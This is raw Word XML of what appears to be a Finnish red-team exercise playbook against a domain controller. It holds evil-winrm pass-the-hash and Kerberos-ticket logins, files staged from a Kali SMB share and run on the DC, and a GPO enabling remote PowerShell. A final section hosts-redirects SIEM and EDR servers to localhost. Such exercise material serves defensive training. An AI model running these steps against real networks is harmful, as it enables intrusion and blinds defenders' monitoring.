        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C1008C9" wp14:editId="5A3A7411">
            <wp:extent cx="6060468" cy="35718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84" cy="35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4E5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005F5DF9" w:rsidRPr="003354E5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DB6279" w:rsidRPr="003354E5">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">Avataan Evil-WinRM. </w:t>
      </w:r>
      <w:r w:rsidR="00DB6279" w:rsidRPr="00DB6279">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>En saanut Kerberos tunnistusta t</w:t>
      </w:r>
      <w:r w:rsidR="00DB6279">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>oimimaan</w:t>
      </w:r>
      <w:r w:rsidR="00602CBE">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> tämän kanssa</w:t>
      </w:r>
      <w:r w:rsidR="00DB6279">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">, joten käytetään </w:t>
      </w:r>
      <w:r w:rsidR="00602CBE">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">NThash </w:t>
      </w:r>
      <w:r w:rsidR="00DB6279">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>tehdään pass the hash hyökkäys</w:t>
      </w:r>
      <w:r w:rsidR="00602CBE">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BE751C">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE751C" w:rsidRPr="00BE751C">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">Jos BT vaihtaa adminin salasanan niin crendentiaalit on aina </w:t>
      </w:r>
      <w:r w:rsidR="00BE751C">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>mahdollista du</w:t>
      </w:r>
      <w:r w:rsidR="003432E0">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00BE751C">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>bata uudestaan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F135CD5" w14:textId="5098DF3D" w:rsidR="00DB6279" w:rsidRDefault="00DB6279" w:rsidP="00B5278F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>evil-winrm -i [dc-fqdn] -u Administrator -H [NTLM hash]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DA8795" w14:textId="0D314120" w:rsidR="00C77668" w:rsidRDefault="00602CBE" w:rsidP="00B5278F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00602CBE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4213AABA" wp14:editId="5459DE72">
            <wp:extent cx="6220274" cy="1933575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3458" cy="19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2684" w14:textId="427E7124" w:rsidR="00C77668" w:rsidRDefault="00C77668" w:rsidP="00B5278F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C74E18" w14:textId="458C74B0" w:rsidR="00C77668" w:rsidRDefault="00C77668" w:rsidP="00B5278F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C77668">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Vaihtoehtoinen tapa avata evil-w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>inrm käyttäen domain adminin kerberos tikettiä</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD053DD" w14:textId="702A60C1" w:rsidR="00B21C85" w:rsidRDefault="00B21C85" w:rsidP="00B21C85">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">evil-winrm -i [domain] -r </w:t>
      </w:r>
      <w:r w:rsidR="00D9499C">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[domain]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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D9499C">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>--spn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 xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="00D9499C">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>spn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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F327EDC" w14:textId="4F39C458" w:rsidR="00C77668" w:rsidRPr="00D9499C" w:rsidRDefault="00C77668" w:rsidP="00B5278F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="762E38B6" w14:textId="6A19FFD0" w:rsidR="00C77668" w:rsidRPr="00C77668" w:rsidRDefault="00AB5242" w:rsidP="00B5278F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4B79AB9A" wp14:editId="201E5771">
            <wp:extent cx="4848225" cy="288998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10" cy="29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09FD" w14:textId="77777777" w:rsidR="00465A5E" w:rsidRPr="00C77668" w:rsidRDefault="00465A5E" w:rsidP="00B5278F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB9EC90" w14:textId="7C862015" w:rsidR="002A7E08" w:rsidRPr="004510B7" w:rsidRDefault="002A7E08" w:rsidP="002727A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc131534304"/>
      <w:r w:rsidRPr="004510B7">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Evil</w:t>
      </w:r>
      <w:r w:rsidR="0020109F" w:rsidRPr="004510B7">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="004510B7">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>WinRM tiedostojen siirto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="4089C2FC" w14:textId="000A130B" w:rsidR="0020109F" w:rsidRPr="004510B7" w:rsidRDefault="0020109F" w:rsidP="0020109F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D894A24" w14:textId="20417411" w:rsidR="0020109F" w:rsidRDefault="00BB3E44" w:rsidP="0020109F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3E44">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Seuraavissa stepeissä kuvatut tiedostojen s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">iirrot on mahdollista tehdä käyttäen myös evil-winrm sisäistä tiedoston siirto </w:t>
      </w:r>
      <w:r w:rsidR="00673EE8">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>ominaisuutta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0E7F61" w14:textId="5F60A688" w:rsidR="00DF624A" w:rsidRPr="00DF624A" w:rsidRDefault="00DF624A" w:rsidP="0020109F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF624A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Upload path/filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411211A1" w14:textId="75BAAEC6" w:rsidR="00673EE8" w:rsidRDefault="00DF624A" w:rsidP="0020109F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF624A">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15CFE2BC" wp14:editId="370D9CB4">
            <wp:extent cx="4980842" cy="19621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2446" cy="1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FEBF" w14:textId="77777777" w:rsidR="00BB3E44" w:rsidRPr="00BB3E44" w:rsidRDefault="00BB3E44" w:rsidP="0020109F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03562C1B" w14:textId="77777777" w:rsidR="002A7E08" w:rsidRPr="00BB3E44" w:rsidRDefault="002A7E08" w:rsidP="002A7E08">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="055C22AE" w14:textId="77777777" w:rsidR="002A7E08" w:rsidRPr="00BB3E44" w:rsidRDefault="002A7E08" w:rsidP="002727A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B3B7C4F" w14:textId="5DB50A61" w:rsidR="002727A6" w:rsidRDefault="002727A6" w:rsidP="002727A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc131534305"/>
      <w:r>
        <w:t>BP - DC - Lateral Movement - Remote Services Windows - Remote Management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="1BC8F195" w14:textId="5EACC864" w:rsidR="00602CBE" w:rsidRDefault="00346995" w:rsidP="00602CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00346995">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Luodaan Grop policy, joka sa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">llii domanissa </w:t>
      </w:r>
      <w:r w:rsidR="00BD0073">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>powerhsellin etäkäytön</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25907CF8" w14:textId="0729EFB7" w:rsidR="00BD0073" w:rsidRDefault="000E331C" w:rsidP="00602CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Ha</w:t>
      </w:r>
      <w:r w:rsidR="00DE397A">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="009A3ED1">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Teamssistä</w:t>
      </w:r>
      <w:r w:rsidR="00DE397A">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> oheiset tiedostot </w:t>
      </w:r>
      <w:r w:rsidR="009A3ED1">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="002C0B0C">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>enable-winrm.gpo.zip</w:t>
      </w:r>
      <w:r w:rsidR="009A3ED1">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="002C0B0C">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> ja </w:t>
      </w:r>
      <w:r w:rsidR="009A3ED1">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="002C0B0C">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>enable-winrm.ps1</w:t>
      </w:r>
      <w:r w:rsidR="009A3ED1">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="002C0B0C">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali kon</w:t>
      </w:r>
      <w:r w:rsidR="0098078B">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="002C0B0C">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>elle</w:t>
      </w:r>
      <w:r w:rsidR="00EE55A9">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>. Tiedostot löytyvät dc:n blueprinttien alta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D47183" w14:textId="77777777" w:rsidR="00EE55A9" w:rsidRDefault="00EE55A9" w:rsidP="00602CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F1A42D" w14:textId="32AD5C13" w:rsidR="002C0B0C" w:rsidRDefault="002C0B0C" w:rsidP="00602CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">Avataan SMB jako </w:t>
      </w:r>
      <w:r w:rsidR="009A3ED1">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Kali koneella, ja haetaan tiedosto DC koneelle</w:t>
      </w:r>
      <w:r w:rsidR="00755BED">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> haluttuun kansioon</w:t>
      </w:r>
      <w:r w:rsidR="009A3ED1">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A7B053" w14:textId="5134CFE7" w:rsidR="00EA666E" w:rsidRDefault="00EA666E" w:rsidP="00602CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>impacket-smbserver [share-name]</w:t>
      </w:r>
      <w:r w:rsidR="0098078B"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 xml:space="preserve">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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1690543B" w14:textId="39FC2ADC" w:rsidR="00DE397A" w:rsidRDefault="00DE397A" w:rsidP="00602CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF8AB3D" w14:textId="77777777" w:rsidR="00EA666E" w:rsidRDefault="00DE397A" w:rsidP="00602CBE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769CB58D" wp14:editId="0FB51C5B">
            <wp:extent cx="5062391" cy="2257425"/>
            <wp:effectExtent l="0" t="0" r="508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61" cy="226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462A" w14:textId="77777777" w:rsidR="00EA666E" w:rsidRDefault="00EA666E" w:rsidP="00602CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="271F0D56" w14:textId="6D4F68BE" w:rsidR="00AA7651" w:rsidRDefault="00AA7651" w:rsidP="00602CBE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Copy-Item \\server ip]\[share name]\*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1605C0EA" w14:textId="77777777" w:rsidR="009178BF" w:rsidRDefault="00F81080" w:rsidP="00602CB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4522A87B" wp14:editId="35E2347F">
            <wp:extent cx="5419234" cy="158591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74" cy="15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74C2" w14:textId="77777777" w:rsidR="009178BF" w:rsidRDefault="009178BF" w:rsidP="00602CBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD559A7" w14:textId="55B0FA9A" w:rsidR="001E5053" w:rsidRDefault="009178BF" w:rsidP="00602CB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jetaan</w:t>
      </w:r>
      <w:r w:rsidR="001E5053">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> powershell scripti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018AD66B" w14:textId="045BE66F" w:rsidR="000101CC" w:rsidRDefault="00D25BE0" w:rsidP="00602CBE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.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/enable-winrm.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA69552" w14:textId="77777777" w:rsidR="00D25BE0" w:rsidRDefault="000101CC" w:rsidP="00602CBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000101CC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0D9B288D" wp14:editId="4814814B">
            <wp:extent cx="4874284" cy="3876675"/>
            <wp:effectExtent l="0" t="0" r="254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3624" cy="38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F6F8" w14:textId="77777777" w:rsidR="00D25BE0" w:rsidRDefault="00D25BE0" w:rsidP="00602CBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A050215" w14:textId="78863847" w:rsidR="00DE397A" w:rsidRPr="00295033" w:rsidRDefault="00D25BE0" w:rsidP="00602CBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25BE0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Policyillä kestää päivittyä noin 90m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">in, joten </w:t>
      </w:r>
      <w:r w:rsidR="002834B9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>tämän jälkeen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C7E49">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>harjoituksessa odotellaan ennen seuraavia vaiheita</w:t>
      </w:r>
      <w:r w:rsidR="00295033">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>. Tai vaihtoehtoisesti voidaan ajastaa seuraavien vaiheiden scriptit käynnistymään automaattisesti 100 min kuluttua.</w:t>
      </w:r>
      <w:r w:rsidR="00F81080" w:rsidRPr="00D25BE0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DE397A" w:rsidRPr="00D25BE0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3298CEEA" w14:textId="77777777" w:rsidR="00F11FFC" w:rsidRPr="00D25BE0" w:rsidRDefault="00F11FFC" w:rsidP="00602CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="241CA1B7" w14:textId="58B7CDAE" w:rsidR="002727A6" w:rsidRDefault="002727A6" w:rsidP="002727A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc131534306"/>
      <w:r>
        <w:t>BP - DC - Defense Evasion - File and Directory Permissions Modification</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="050641A9" w14:textId="31C14CEF" w:rsidR="387739E8" w:rsidRPr="00C5129F" w:rsidRDefault="387739E8" w:rsidP="69265941">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="69265941">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Tämä scripti muokkaa SIEM ja EDR palvelimien host FQDN:t osoittamaan localhostiin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DD1CE6" w14:textId="33418EC3" w:rsidR="00C851F5" w:rsidRDefault="003C03D5" w:rsidP="002834B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C528B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Hae teamssistä </w:t>
      </w:r>
      <w:r w:rsidR="00F66E3C">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>tiedosto</w:t>
      </w:r>
      <w:r w:rsidRPr="007C528B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C528B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="007C528B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>new-task-hosts.ps1</w:t>
      </w:r>
      <w:r w:rsidR="007C528B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="007C528B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> ja </w:t>
      </w:r>
      <w:r w:rsidR="007C528B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="007C528B" w:rsidRPr="007C528B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>write_to_hosts.ps1</w:t>
      </w:r>
      <w:r w:rsidR="007C528B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F37A54" w14:textId="2B3AB87F" w:rsidR="007C528B" w:rsidRDefault="00F66E3C" w:rsidP="002834B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C528B">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Muokkaamalla</w:t>
      </w:r>
      <w:r w:rsidR="007C528B" w:rsidRPr="007C528B">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
